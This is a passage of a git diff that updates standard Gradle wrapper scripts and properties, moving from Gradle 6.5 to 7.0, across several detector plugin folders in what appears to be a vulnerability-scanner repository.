MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/directorytraversal/cve202017519/gradlew.bat b/google/detectors/directorytraversal/cve202017519/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/directorytraversal/cve202017519/gradlew.bat +++ b/google/detectors/directorytraversal/cve202017519/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/directorytraversal/cve20213223/gradlew b/google/detectors/directorytraversal/cve20213223/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/directorytraversal/cve20213223/gradlew +++ b/google/detectors/directorytraversal/cve20213223/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/directorytraversal/cve20213223/gradlew.bat b/google/detectors/directorytraversal/cve20213223/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/directorytraversal/cve20213223/gradlew.bat +++ b/google/detectors/directorytraversal/cve20213223/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/apache_nifi_api/gradlew b/google/detectors/exposedui/apache_nifi_api/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/apache_nifi_api/gradlew +++ b/google/detectors/exposedui/apache_nifi_api/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { 